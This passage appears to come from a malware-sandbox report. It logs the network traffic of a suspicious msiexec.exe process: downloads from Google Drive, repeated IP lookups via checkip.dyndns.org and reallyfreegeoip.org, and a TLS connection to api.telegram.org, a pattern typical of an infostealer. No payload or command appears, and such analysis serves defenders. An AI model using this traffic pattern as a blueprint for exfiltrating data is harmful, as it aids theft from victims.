                                                                                                                                    Nov 20, 2024 10:10:43.307977915 CET8049973193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:43.357261896 CET4997380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:43.378571987 CET4997380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:43.383665085 CET8049973193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:43.479522943 CET8049973193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:43.536221981 CET4997380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:44.027581930 CET49974443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:44.027689934 CET44349974188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:44.027782917 CET49974443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:44.030833006 CET49974443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:44.030867100 CET44349974188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:44.511655092 CET44349974188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:44.511826038 CET49974443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:44.520930052 CET49974443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:44.520968914 CET44349974188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:44.521295071 CET44349974188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:44.534173012 CET49974443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:44.579336882 CET44349974188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:44.641700029 CET44349974188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:44.641772032 CET44349974188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:44.641849995 CET49974443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:44.647578001 CET49974443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:44.656727076 CET4997380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:44.665029049 CET8049973193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:47.916915894 CET8049973193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:47.947108030 CET4997380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:47.952102900 CET8049973193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:51.048069954 CET8049973193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:51.096263885 CET4997380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:51.152018070 CET4997380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:51.159703016 CET8049973193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:52.290719032 CET8049973193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:52.293432951 CET49975443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:52.293488026 CET44349975188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:52.293628931 CET49975443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:52.293988943 CET49975443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:52.294012070 CET44349975188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:52.341659069 CET4997380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:52.754931927 CET44349975188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:52.757225037 CET49975443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:52.757276058 CET44349975188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:52.893502951 CET44349975188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:52.893604040 CET44349975188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:52.893672943 CET49975443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:52.894179106 CET49975443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:52.897874117 CET4997380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:52.899199009 CET4997680192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:52.903003931 CET8049973193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:52.903074980 CET4997380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:52.904223919 CET8049976193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:52.904309034 CET4997680192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:52.904422998 CET4997680192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:52.909264088 CET8049976193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:53.391855955 CET8049976193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:53.393310070 CET49977443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:53.393364906 CET44349977188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:53.393429995 CET49977443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:53.393759012 CET49977443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:53.393779993 CET44349977188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:53.435578108 CET4997680192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:53.873471975 CET44349977188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:53.875107050 CET49977443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:53.875149965 CET44349977188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:54.026448011 CET44349977188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:54.026616096 CET44349977188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:54.026793957 CET49977443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:54.030999899 CET49977443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:54.040303946 CET4997880192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:54.048141956 CET8049978193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:54.048230886 CET4997880192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:54.048418999 CET4997880192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:54.056389093 CET8049978193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:54.506896973 CET8049978193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:54.516032934 CET49979443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:54.516138077 CET44349979188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:54.516385078 CET49979443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:54.516578913 CET49979443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:54.516613007 CET44349979188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:54.560426950 CET4997880192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:54.986207008 CET44349979188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:55.030092001 CET49979443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:55.030414104 CET49979443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:55.030443907 CET44349979188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:55.140181065 CET44349979188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:55.140335083 CET44349979188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:55.140408993 CET49979443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:55.141777039 CET49979443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:55.178414106 CET4997880192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:55.179542065 CET4998080192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:55.184063911 CET8049978193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:55.184122086 CET4997880192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:55.184444904 CET8049980193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:55.184506893 CET4998080192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:55.184561968 CET4998080192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:55.189368963 CET8049980193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:57.668148994 CET8049980193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:57.671205044 CET4998080192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:57.671911955 CET4998180192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:57.677913904 CET8049980193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:57.678081036 CET4998080192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:57.678389072 CET8049981193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:57.678459883 CET4998180192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:57.678512096 CET4998180192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:57.684905052 CET8049981193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:59.140129089 CET8049981193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:59.141819000 CET49982443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:59.141859055 CET44349982188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:59.141938925 CET49982443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:59.142266989 CET49982443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:59.142277956 CET44349982188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:59.185437918 CET4998180192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:59.613791943 CET44349982188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:59.619929075 CET49982443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:59.619947910 CET44349982188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:59.754544973 CET44349982188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:59.754740953 CET44349982188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:59.754801035 CET49982443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:59.755178928 CET49982443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:10:59.758305073 CET4998180192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:59.759478092 CET4998380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:59.763914108 CET8049981193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:59.763979912 CET4998180192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:59.764384031 CET8049983193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:59.764458895 CET4998380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:59.764533043 CET4998380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:10:59.769301891 CET8049983193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:01.663237095 CET8049983193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:01.664355040 CET49984443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:11:01.664407969 CET44349984188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:01.664500952 CET49984443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:11:01.664899111 CET49984443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:11:01.664915085 CET44349984188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:01.721573114 CET4998380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:11:02.137075901 CET44349984188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:02.138938904 CET49984443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:11:02.138967991 CET44349984188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:02.291366100 CET44349984188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:02.291521072 CET44349984188.114.96.3192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:02.291677952 CET49984443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:11:02.291805983 CET49984443192.168.2.7188.114.96.3
                                                                                                                                    Nov 20, 2024 10:11:02.309338093 CET4998380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:11:02.317579985 CET8049983193.122.130.0192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:02.317661047 CET4998380192.168.2.7193.122.130.0
                                                                                                                                    Nov 20, 2024 10:11:02.320910931 CET49985443192.168.2.7149.154.167.220
                                                                                                                                    Nov 20, 2024 10:11:02.320940018 CET44349985149.154.167.220192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:02.321157932 CET49985443192.168.2.7149.154.167.220
                                                                                                                                    Nov 20, 2024 10:11:02.321680069 CET49985443192.168.2.7149.154.167.220
                                                                                                                                    Nov 20, 2024 10:11:02.321696997 CET44349985149.154.167.220192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:02.943507910 CET44349985149.154.167.220192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:02.943603039 CET49985443192.168.2.7149.154.167.220
                                                                                                                                    Nov 20, 2024 10:11:02.946240902 CET49985443192.168.2.7149.154.167.220
                                                                                                                                    Nov 20, 2024 10:11:02.946248055 CET44349985149.154.167.220192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:02.946649075 CET44349985149.154.167.220192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:02.948381901 CET49985443192.168.2.7149.154.167.220
                                                                                                                                    Nov 20, 2024 10:11:02.991369963 CET44349985149.154.167.220192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:03.197629929 CET44349985149.154.167.220192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:03.197788954 CET44349985149.154.167.220192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:03.197896957 CET49985443192.168.2.7149.154.167.220
                                                                                                                                    Nov 20, 2024 10:11:03.198251009 CET49985443192.168.2.7149.154.167.220
                                                                                                                                    Nov 20, 2024 10:11:11.518691063 CET4997680192.168.2.7193.122.130.0

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Nov 20, 2024 10:10:36.042651892 CET5760453192.168.2.71.1.1.1
                                                                                                                                    Nov 20, 2024 10:10:36.053245068 CET53576041.1.1.1192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:37.148367882 CET5575053192.168.2.71.1.1.1
                                                                                                                                    Nov 20, 2024 10:10:37.155528069 CET53557501.1.1.1192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:40.826793909 CET5046753192.168.2.71.1.1.1
                                                                                                                                    Nov 20, 2024 10:10:40.834703922 CET53504671.1.1.1192.168.2.7
                                                                                                                                    Nov 20, 2024 10:10:44.018672943 CET5934553192.168.2.71.1.1.1
                                                                                                                                    Nov 20, 2024 10:10:44.026604891 CET53593451.1.1.1192.168.2.7
                                                                                                                                    Nov 20, 2024 10:11:02.310062885 CET5584353192.168.2.71.1.1.1
                                                                                                                                    Nov 20, 2024 10:11:02.320328951 CET53558431.1.1.1192.168.2.7

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Nov 20, 2024 10:10:36.042651892 CET192.168.2.71.1.1.10x76caStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:10:37.148367882 CET192.168.2.71.1.1.10x8668Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:10:40.826793909 CET192.168.2.71.1.1.10x16bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:10:44.018672943 CET192.168.2.71.1.1.10x94f2Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:11:02.310062885 CET192.168.2.71.1.1.10xae0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Nov 20, 2024 10:10:36.053245068 CET1.1.1.1192.168.2.70x76caNo error (0)drive.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:10:37.155528069 CET1.1.1.1192.168.2.70x8668No error (0)drive.usercontent.google.com142.250.186.33A (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:10:40.834703922 CET1.1.1.1192.168.2.70x16bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:10:40.834703922 CET1.1.1.1192.168.2.70x16bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:10:40.834703922 CET1.1.1.1192.168.2.70x16bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:10:40.834703922 CET1.1.1.1192.168.2.70x16bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:10:40.834703922 CET1.1.1.1192.168.2.70x16bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:10:40.834703922 CET1.1.1.1192.168.2.70x16bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:10:44.026604891 CET1.1.1.1192.168.2.70x94f2No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:10:44.026604891 CET1.1.1.1192.168.2.70x94f2No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                    Nov 20, 2024 10:11:02.320328951 CET1.1.1.1192.168.2.70xae0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • drive.google.com
                                                                                                                                    • drive.usercontent.google.com
                                                                                                                                    • reallyfreegeoip.org
                                                                                                                                    • api.telegram.org
                                                                                                                                    • checkip.dyndns.org

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.749973193.122.130.0802500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 20, 2024 10:10:40.843444109 CET151OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Nov 20, 2024 10:10:43.307977915 CET320INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:43 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Request-ID: 17811a46d74f60580dcc93b01f6409d6
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                    Nov 20, 2024 10:10:43.378571987 CET127OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Nov 20, 2024 10:10:43.479522943 CET320INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:43 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Request-ID: 407b849cea1f2a2cca8f411c9d4cb859
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                    Nov 20, 2024 10:10:44.656727076 CET127OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Nov 20, 2024 10:10:47.916915894 CET745INHTTP/1.1 504 Gateway Time-out
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:47 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 557
                                                                                                                                    Connection: keep-alive
                                                                                                                                    X-Request-ID: 3f8635d67bb945f0e7cb4af650804494
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                                    Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                    Nov 20, 2024 10:10:47.947108030 CET127OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Nov 20, 2024 10:10:51.048069954 CET745INHTTP/1.1 504 Gateway Time-out
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:51 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 557
                                                                                                                                    Connection: keep-alive
                                                                                                                                    X-Request-ID: aa6cb6383d3b664bc8839490678a64e0
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                                    Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                    Nov 20, 2024 10:10:51.152018070 CET127OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                    Host: checkip.dyndns.org
                                                                                                                                    Nov 20, 2024 10:10:52.290719032 CET320INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 20 Nov 2024 09:10:52 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 103
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Request-ID: f2817ad3199b3035d8ab79b697002663
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.749976193.122.130.0802500C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Nov 20, 2024 10:10:52.904422998 CET127OUTGET / HTTP/1.1
